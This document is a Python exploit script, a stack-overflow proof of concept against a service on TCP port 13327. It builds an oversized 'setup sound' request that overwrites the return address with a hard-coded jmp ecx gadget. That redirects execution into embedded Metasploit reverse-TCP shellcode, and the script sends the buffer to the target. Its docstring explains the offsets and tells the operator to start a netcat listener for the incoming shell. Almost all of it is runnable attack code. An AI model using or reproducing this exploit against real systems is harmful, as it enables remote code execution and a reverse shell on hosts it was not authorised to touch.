Exploit
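#!/usr/bin/env python3
"""Stack-overflow proof of concept for a service listening on TCP 13327.

Script by Wulfzz (Axua); ported from Python 2 (``print`` statements, str/bytes
mixing) to Python 3 so the bytes on the wire are exactly the intended ones.

How the buffer is laid out (offsets measured from the byte after PREFIX):

    [ 0x41 * 4198 ][ shellcode ][ 0x41 pad ][ jmp ecx ][ 0x90 * 8 ][ 0x00 ]
    ^ECX_OFFSET=4198             ^RET_OFFSET=4368

The original author's notes give two offsets: the saved return address sits
4368 bytes in, and ``ecx`` points 4198 bytes in when that return executes.
The return address is overwritten with a ``jmp ecx`` gadget so control lands
on the shellcode placed at ECX_OFFSET; the 170-byte gap between the two
offsets is the only room the shellcode has.

Practitioner caveats (not verifiable from this file alone, treat as
assumptions to confirm against the target):

* The gadget address 0x0813C51F looks like a fixed address inside the
  target's own 32-bit ELF image; it is build-specific and only works if that
  image is not position-independent/randomised.  Re-find it per binary.
* The shellcode runs from the buffer ``ecx`` points into, so that memory must
  be executable (NX disabled or not enforced for that region).
* The trailing 0x00 suggests the target consumes the request as a C string,
  so no other byte in the buffer may be NUL.  build_payload() enforces this.
* The shellcode is a Metasploit ``linux/x86/shell_reverse_tcp`` with
  LHOST=127.0.0.1 LPORT=4444: start a listener on that port first
  (``nc -lvp 4444``) and regenerate the blob with msfvenom if either value
  changes -- LHOST/LPORT are baked into the bytes, not read from HOST/PORT.
* Only run this against systems you are authorised to test.
"""
import socket
import struct

HOST = "127.0.0.1"
PORT = 13327

# Offsets from the first byte after PREFIX (values from the original notes).
ECX_OFFSET = 4198                         # ecx points here at the ret -> shellcode goes here
RET_OFFSET = 4368                         # saved return address -> jmp ecx gadget
SHELLCODE_SLOT = RET_OFFSET - ECX_OFFSET  # 170 bytes available between the two

JMP_ECX = 0x0813C51F  # address of a `jmp ecx` gadget in the target binary (build-specific)

# Request prefix the target expects before the oversized argument.
PREFIX = b"\x11(setup sound "

# linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 (NUL-free, 95 bytes)
SHELLCODE = (
    b"\xbe\xc1\x25\xda\x2c\xdd\xc7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
    b"\x12\x31\x72\x12\x83\xea\xfc\x03\xb3\x2b\x38\xd9\x02\xef\x4b"
    b"\xc1\x37\x4c\xe7\x6c\xb5\xdb\xe6\xc1\xdf\x16\x68\xb2\x46\x19"
    b"\x56\x78\xf8\x10\xd0\x7b\x90\xdd\x22\x7c\x61\x4a\x21\x7c\x70"
    b"\xd6\xac\x9d\xc2\x80\xfe\x0c\x71\xfe\xfc\x27\x94\xcd\x83\x6a"
    b"\x3e\xa0\xac\xf9\xd6\x54\x9c\xd2\x44\xcc\x6b\xcf\xda\x5d\xe5"
    b"\xf1\x6a\x6a\x38\x71"
)


def build_payload(shellcode: bytes = SHELLCODE) -> bytes:
    """Return the complete request that overwrites the return address.

    Args:
        shellcode: NUL-free machine code to place at ECX_OFFSET.  Must fit in
            SHELLCODE_SLOT bytes; the original script silently emitted a
            broken buffer (negative padding) when it did not.

    Returns:
        PREFIX + padding + shellcode + padding + jmp-ecx address + NOPs + NUL.

    Raises:
        ValueError: if ``shellcode`` exceeds SHELLCODE_SLOT bytes or contains
            a 0x00 byte (which would presumably truncate the request early).
    """
    if len(shellcode) > SHELLCODE_SLOT:
        raise ValueError(
            "shellcode is %d bytes, slot is %d" % (len(shellcode), SHELLCODE_SLOT)
        )
    if b"\x00" in shellcode:
        raise ValueError("shellcode must not contain NUL bytes")

    padding_to_ecx = b"\x41" * ECX_OFFSET
    padding_to_ret = b"\x41" * (SHELLCODE_SLOT - len(shellcode))
    jmp_ecx = struct.pack("<I", JMP_ECX)  # little-endian, as it sits on the stack

    return (
        PREFIX
        + padding_to_ecx
        + shellcode
        + padding_to_ret
        + jmp_ecx
        + b"\x90" * 8   # harmless NOP tail after the overwritten return address
        + b"\x00"       # terminates the request
    )


def send_payload(host: str, port: int, payload: bytes,
                 timeout: "float | None" = None) -> bytes:
    """Connect to the target, read its banner, then send ``payload``.

    Args:
        host: target address.
        port: target TCP port.
        payload: bytes to send after the banner is received.
        timeout: socket timeout in seconds; None (the default, matching the
            original script) blocks indefinitely if the target never answers.

    Returns:
        Whatever the target sent first (up to 1024 bytes), for the caller to
        display.  ``sendall`` is used so a partial ``send`` cannot truncate the
        overflow; the ``with`` block closes the socket even on error.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        banner = sock.recv(1024)
        sock.sendall(payload)
    return banner


def main() -> None:
    """Build the payload and fire it at HOST:PORT, echoing the banner."""
    payload = build_payload()
    banner = send_payload(HOST, PORT, payload)
    print(banner.decode("ascii", errors="replace"))
    print("* Payload sent.")


if __name__ == "__main__":
    main()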